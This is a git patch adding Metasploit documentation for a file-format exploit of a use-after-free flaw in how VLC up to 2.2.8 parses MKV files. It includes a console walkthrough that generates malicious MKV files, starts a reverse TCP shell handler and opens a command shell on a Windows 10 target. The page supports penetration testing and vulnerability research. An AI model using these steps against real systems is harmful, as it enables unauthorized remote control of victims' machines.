From 6544c6636ca598164b3c02f0912dff79b6796d0a Mon Sep 17 00:00:00 2001
From: Jacob Robles <jrobles@rapid7.com>
Date: Wed, 10 Oct 2018 12:23:52 -0500
Subject: [PATCH] Add documentation

---
 .../exploit/windows/fileformat/vlc_mkv.md     | 51 +++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 documentation/modules/exploit/windows/fileformat/vlc_mkv.md

diff --git a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md
new file mode 100644
index 0000000000..25e306b25e
--- /dev/null
+++ b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md
@@ -0,0 +1,51 @@
+## Description
+
+VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.
+
+This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.
+
+## Vulnerable Application
+
+[VLC](https://get.videolan.org/vlc/) <= v2.2.8
+
+## Verification Steps
+
+- `./msfconsole -q`
+- `use exploit/windows/fileformat/vlc_mkv`
+- `run`
+- Start handler
+- Copy over mkv files to target hosts and open part1 in VLC
+- Set a shell
+
+## Scenarios
+
+### Windows 10 x64 running VLC 2.2.8 (x64)
+
+```
+msf5 > use exploit/windows/fileformat/vlc_mkv
+msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
+lhost => 172.22.222.134
+msf5 exploit(windows/fileformat/vlc_mkv) > run
+
+[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
+[*] Created tjub-part1.mkv. Target should open this file
+[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
+[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
+[*] Appending blocks to tjub-part1.mkv
+[+] Succesfully appended blocks to tjub-part1.mkv
+msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
+[*] Payload handler running as background job 0.
+msf5 exploit(windows/fileformat/vlc_mkv) > 
+[*] Started reverse TCP handler on 172.22.222.134:4444 
+[*] Sending stage (336 bytes) to 172.22.222.200
+[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
+sessions -i 2
+[*] Starting interaction with 2...
+
+systeminfo
+systeminfo
+
+Host Name:                 DESKTOP-IPOGIJR
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.17134 N/A Build 17134
+```